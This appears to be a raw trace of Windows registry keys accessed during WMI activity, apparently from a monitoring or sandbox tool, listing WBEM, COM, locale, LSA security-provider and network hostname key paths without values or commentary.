HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{5A4B1C7F-0474-4F5A-AD71-412EF0F51D47}\CreationTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{5A4B1C7F-0474-4F5A-AD71-412EF0F51D47}\Provider HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{5A4B1C7F-0474-4F5A-AD71-412EF0F51D47}\Scope HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{5A4B1C7F-0474-4F5A-AD71-412EF0F51D47}\Locale HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{5A4B1C7F-0474-4F5A-AD71-412EF0F51D47}\User HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{5A4B1C7F-0474-4F5A-AD71-412EF0F51D47}\MarshaledProxy HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{5A4B1C7F-0474-4F5A-AD71-412EF0F51D47}\ProcessIdentifier HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\Transports\Decoupled\Client\{AB8C10DB-938A-46E7-81A7-3B33DEC13555} HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{AB8C10DB-938A-46E7-81A7-3B33DEC13555}\CreationTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{AB8C10DB-938A-46E7-81A7-3B33DEC13555}\Provider HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{AB8C10DB-938A-46E7-81A7-3B33DEC13555}\Scope HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{AB8C10DB-938A-46E7-81A7-3B33DEC13555}\Locale HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{AB8C10DB-938A-46E7-81A7-3B33DEC13555}\User HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{AB8C10DB-938A-46E7-81A7-3B33DEC13555}\MarshaledProxy HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{AB8C10DB-938A-46E7-81A7-3B33DEC13555}\ProcessIdentifier HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\Transports\Decoupled\Client\{F0CE0BE7-6BC7-49B5-8E71-F5FEEA56D0B1} HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{F0CE0BE7-6BC7-49B5-8E71-F5FEEA56D0B1}\CreationTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{F0CE0BE7-6BC7-49B5-8E71-F5FEEA56D0B1}\Provider HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{F0CE0BE7-6BC7-49B5-8E71-F5FEEA56D0B1}\Scope HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{F0CE0BE7-6BC7-49B5-8E71-F5FEEA56D0B1}\Locale HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{F0CE0BE7-6BC7-49B5-8E71-F5FEEA56D0B1}\User HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{F0CE0BE7-6BC7-49B5-8E71-F5FEEA56D0B1}\MarshaledProxy HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{F0CE0BE7-6BC7-49B5-8E71-F5FEEA56D0B1}\ProcessIdentifier HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\Transports\Decoupled\Server HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Server\CreationTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Server\MarshaledProxy HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Server\ProcessIdentifier HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\EnableEvents HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ConfigValueEssToBeInitialized HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Low Threshold On Events (B) HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\High Threshold On Events (B) HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Max Wait On Events (ms) HKEY_LOCAL_MACHINE\Software\Microsoft\WBEM\ESS HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Merger Query Arbitration Enabled HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\CIMOM HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\FinalizerBatchSize HKEY_LOCAL_MACHINE\software\microsoft\wbem\cimom HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\SetupDate HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ClientCallbackTimeout HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Max Async Result Queue Size HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\FinalizerQueueThreshold HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Max Tasks HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\cimv2 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\cimv2 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ConfigValueEssNeedsLoading HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\List of event-active namespaces HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\ESS\//./root/subscription HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\ESS\//./root/CIMV2 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{9556DC99-828C-11CF-A37E-00AA003240C7} HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{9556DC99-828C-11CF-A37E-00AA003240C7}\ProxyStubClsid32 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{9556DC99-828C-11CF-A37E-00AA003240C7}\ProxyStubClsid32\(Default) HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA} HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\TreatAs HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\Progid HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\Progid HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\(Default) HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocServer32 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocServer32\InprocServer32 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocServer32\(Default) HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocServer32\ThreadingModel HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocHandler32 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocHandler HKEY_LOCAL_MACHINE\Software\Microsoft\OleAut HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{027947E1-D731-11CE-A357-000000000001} HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{027947E1-D731-11CE-A357-000000000001}\ProxyStubClsid32 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{027947E1-D731-11CE-A357-000000000001}\ProxyStubClsid32\(Default) HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD} HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\TreatAs HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\Progid HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\Progid HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\(Default) HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocServer32 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocServer32\InprocServer32 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocServer32\(Default) HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocServer32\ThreadingModel HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocHandler32 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocHandler HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{1C1C45EE-4395-11D2-B60B-00104B703EFD} HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{1C1C45EE-4395-11D2-B60B-00104B703EFD}\ProxyStubClsid32 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{1C1C45EE-4395-11D2-B60B-00104B703EFD}\ProxyStubClsid32\(Default) HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{423EC01E-2E35-11D2-B604-00104B703EFD} HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{423EC01E-2E35-11D2-B604-00104B703EFD}\ProxyStubClsid32 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{423EC01E-2E35-11D2-B604-00104B703EFD}\ProxyStubClsid32\(Default) HKEY_CLASSES_ROOT\CLSID\{661FF7F6-F4D1-4593-B59D-4C54C1ECE68B}\InProcServer32 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{661FF7F6-F4D1-4593-B59D-4C54C1ECE68B}\InprocServer32\(Default) HKEY_CLASSES_ROOT\CLSID\{661FF7F6-F4D1-4593-B59D-4C54C1ECE68B}\LocalServer32 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{661FF7F6-F4D1-4593-B59D-4C54C1ECE68B}\InprocServer32\ThreadingModel HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{661FF7F6-F4D1-4593-B59D-4C54C1ECE68B}\InprocServer32\Synchronization HKEY_CLASSES_ROOT\CLSID\{661FF7F6-F4D1-4593-B59D-4C54C1ECE68B} HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{661FF7F6-F4D1-4593-B59D-4C54C1ECE68B}\(Default) HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{661FF7F6-F4D1-4593-B59D-4C54C1ECE68B}\AppId HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{661FF7F6-F4D1-4593-B59D-4C54C1ECE68B}\InprocServer32\(Default) HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{661FF7F6-F4D1-4593-B59D-4C54C1ECE68B}\InprocServer32\ThreadingModel HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{661FF7F6-F4D1-4593-B59D-4C54C1ECE68B}\InprocServer32\Synchronization HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{661FF7F6-F4D1-4593-B59D-4C54C1ECE68B}\(Default) HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{661FF7F6-F4D1-4593-B59D-4C54C1ECE68B}\AppId HKEY_CLASSES_ROOT\CLSID\{d63a5850-8f16-11cf-9f47-00aa00bf345c}\InProcServer32 HKEY_CLASSES_ROOT\CLSID\{d63a5850-8f16-11cf-9f47-00aa00bf345c}\LocalServer32 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D63A5850-8F16-11CF-9F47-00AA00BF345C}\InprocServer32\(Default) HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D63A5850-8F16-11CF-9F47-00AA00BF345C}\InprocServer32\ThreadingModel HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D63A5850-8F16-11CF-9F47-00AA00BF345C}\InprocServer32\Synchronization HKEY_CLASSES_ROOT\CLSID\{d63a5850-8f16-11cf-9f47-00aa00bf345c} HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D63A5850-8F16-11CF-9F47-00AA00BF345C}\(Default) HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D63A5850-8F16-11CF-9F47-00AA00BF345C}\AppId HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\SecuredHostProviders HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\SecuredHostProviders\ROOT\CIMV2:__Win32Provider.Name="CIMWin32" HKEY_LOCAL_MACHINE\system\currentcontrolset\control\minint HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\ESS\//./root/CIMV2\SCM Event Provider HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\Root HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\Root HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{B7B31DF9-D515-11D3-A11C-00105A1F515A} HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{B7B31DF9-D515-11D3-A11C-00105A1F515A}\ProxyStubClsid32 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{B7B31DF9-D515-11D3-A11C-00105A1F515A}\ProxyStubClsid32\(Default) HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{07435309-D440-41B7-83F3-EB82DB6C622F} HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{07435309-D440-41B7-83F3-EB82DB6C622F}\ProxyStubClsid32 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{07435309-D440-41B7-83F3-EB82DB6C622F}\ProxyStubClsid32\(Default) HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{21CD80A2-B305-4F37-9D4C-4534A8D9B568} HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{21CD80A2-B305-4F37-9D4C-4534A8D9B568}\ProxyStubClsid32 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{21CD80A2-B305-4F37-9D4C-4534A8D9B568}\ProxyStubClsid32\(Default) HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{06413D98-405C-4A5A-8D6F-19B8B7C6ACF7} HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{06413D98-405C-4A5A-8D6F-19B8B7C6ACF7}\ProxyStubClsid32 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{06413D98-405C-4A5A-8D6F-19B8B7C6ACF7}\ProxyStubClsid32\(Default) HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{F50A28CF-5C9C-4F7E-9D80-E25E16E18C59} HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{F50A28CF-5C9C-4F7E-9D80-E25E16E18C59}\ProxyStubClsid32 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{F50A28CF-5C9C-4F7E-9D80-E25E16E18C59}\ProxyStubClsid32\(Default) HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{6B3FC272-BF37-4968-933A-6DF9222A2607} HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{6B3FC272-BF37-4968-933A-6DF9222A2607}\ProxyStubClsid32 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{6B3FC272-BF37-4968-933A-6DF9222A2607}\ProxyStubClsid32\(Default) HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{0FC8C622-1728-4149-A57F-AD19D0970710} HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{0FC8C622-1728-4149-A57F-AD19D0970710}\ProxyStubClsid32 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{0FC8C622-1728-4149-A57F-AD19D0970710}\ProxyStubClsid32\(Default) HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{FEC1B0AC-5808-4033-A915-C0185934581E} HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{FEC1B0AC-5808-4033-A915-C0185934581E}\ProxyStubClsid32 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{FEC1B0AC-5808-4033-A915-C0185934581E}\ProxyStubClsid32\(Default) HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{EB658B8A-7A64-4DDC-9B8D-A92610DB0206} HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{EB658B8A-7A64-4DDC-9B8D-A92610DB0206}\ProxyStubClsid32 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{EB658B8A-7A64-4DDC-9B8D-A92610DB0206}\ProxyStubClsid32\(Default) HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{7C857801-7381-11CF-884D-00AA004B2E24} HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{7C857801-7381-11CF-884D-00AA004B2E24}\ProxyStubClsid32 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{7C857801-7381-11CF-884D-00AA004B2E24}\ProxyStubClsid32\(Default) HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{71285C44-1DC0-11D2-B5FB-00104B703EFD} HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{71285C44-1DC0-11D2-B5FB-00104B703EFD}\TreatAs HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{71285C44-1DC0-11D2-B5FB-00104B703EFD}\Progid HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{71285C44-1DC0-11D2-B5FB-00104B703EFD}\Progid HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{71285C44-1DC0-11D2-B5FB-00104B703EFD}\(Default) HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{71285C44-1DC0-11D2-B5FB-00104B703EFD}\InprocServer32 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{71285C44-1DC0-11D2-B5FB-00104B703EFD}\InprocServer32\InprocServer32 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{71285C44-1DC0-11D2-B5FB-00104B703EFD}\InprocServer32\(Default) HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{71285C44-1DC0-11D2-B5FB-00104B703EFD}\InprocServer32\ThreadingModel HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{71285C44-1DC0-11D2-B5FB-00104B703EFD}\InprocHandler32 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{71285C44-1DC0-11D2-B5FB-00104B703EFD}\InprocHandler HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\SecurityCenter2 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\SecurityCenter2 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\SecurityCenter HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\SecurityCenter HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Sink Transmit Buffer Size HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\Cimom HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\DefaultRpcStackSize HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\LSA\AccessProviders HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\AccessProviders\MartaExtension HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\wmiprvse.exe HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Hostname HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\System\DNSclient HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Domain HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\InprocServer32 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\InprocHandler32 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\InprocHandler HKEY_CURRENT_USER HKEY_CURRENT_USER\Control Panel\International HKEY_CURRENT_USER\Control Panel\International\LocaleName HKEY_CURRENT_USER\Control Panel\International\sCountry HKEY_CURRENT_USER\Control Panel\International\sList HKEY_CURRENT_USER\Control Panel\International\sDecimal HKEY_CURRENT_USER\Control Panel\International\sThousand HKEY_CURRENT_USER\Control Panel\International\sGrouping HKEY_CURRENT_USER\Control Panel\International\sNativeDigits HKEY_CURRENT_USER\Control Panel\International\sCurrency HKEY_CURRENT_USER\Control Panel\International\sMonDecimalSep HKEY_CURRENT_USER\Control Panel\International\sMonThousandSep HKEY_CURRENT_USER\Control Panel\International\sMonGrouping HKEY_CURRENT_USER\Control Panel\International\sPositiveSign HKEY_CURRENT_USER\Control Panel\International\sNegativeSign HKEY_CURRENT_USER\Control Panel\International\sTimeFormat HKEY_CURRENT_USER\Control Panel\International\sShortTime HKEY_CURRENT_USER\Control Panel\International\s1159 HKEY_CURRENT_USER\Control Panel\International\s2359 HKEY_CURRENT_USER\Control Panel\International\sShortDate HKEY_CURRENT_USER\Control Panel\International\sYearMonth HKEY_CURRENT_USER\Control Panel\International\sLongDate HKEY_CURRENT_USER\Control Panel\International\iCountry HKEY_CURRENT_USER\Control Panel\International\iMeasure HKEY_CURRENT_USER\Control Panel\International\iPaperSize HKEY_CURRENT_USER\Control Panel\International\iDigits HKEY_CURRENT_USER\Control Panel\International\iLZero HKEY_CURRENT_USER\Control Panel\International\iNegNumber HKEY_CURRENT_USER\Control Panel\International\NumShape HKEY_CURRENT_USER\Control Panel\International\iCurrDigits HKEY_CURRENT_USER\Control Panel\International\iCurrency HKEY_CURRENT_USER\Control Panel\International\iNegCurr HKEY_CURRENT_USER\Control Panel\International\iCalendarType HKEY_CURRENT_USER\Control Panel\International\iFirstDayOfWeek HKEY_CURRENT_USER\Control Panel\International\iFirstWeekOfYear HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Logging HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Perflib\009 HKEY_PERFORMANCE_TEXT\Counter HKEY_PERFORMANCE_DATA\238 HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\LsaExtensionConfig\SspiCli HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\LsaExtensionConfig\SspiCli\CheckSignatureDll HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\LsaExtensionConfig\SspiCli\CheckSignatureRoutine HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SecurityProviders HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SecurityProviders\SecurityProviders HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa\SspiCache HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\credssp.dll HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\credssp.dll\Name HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\credssp.dll\Comment HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\credssp.dll\Capabilities HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\credssp.dll\RpcId HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\credssp.dll\Version HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\credssp.dll\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\credssp.dll\TokenSize HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SecurityProviders\SaslProfiles HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SecurityProviders\Schannel HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SecurityProviders\SCHANNEL\UserContextLockCount HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SecurityProviders\SCHANNEL\UserContextListCount HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Control Panel\International\sCountry HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Control Panel\International\sList HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Control Panel\International\sDecimal HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Control Panel\International\sThousand HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Control Panel\International\sGrouping HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Control Panel\International\sNativeDigits HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Control Panel\International\sCurrency HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Control Panel\International\sMonDecimalSep HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Control Panel\International\sMonThousandSep HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Control Panel\International\sMonGrouping HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Control Panel\International\sPositiveSign HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Control Panel\International\sNegativeSign HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Control Panel\International\sTimeFormat HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Control Panel\International\sShortTime HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Control Panel\International\s1159 HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Control Panel\International\s2359 HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Control Panel\International\sShortDate HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Control Panel\International\sYearMonth HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Control Panel\International\sLongDate HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Control Panel\International\iCountry HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Control Panel\International\iMeasure HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Control Panel\International\iPaperSize HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Control Panel\International\iDigits HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Control Panel\International\iLZero HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Control Panel\International\iNegNumber HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Control Panel\International\NumShape HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Control Panel\International\iCurrDigits HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Control Panel\International\iCurrency HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Control Panel\International\iNegCurr HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Control Panel\International\iCalendarType HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Control Panel\International\iFirstDayOfWeek HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Control Panel\International\iFirstWeekOfYear HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion 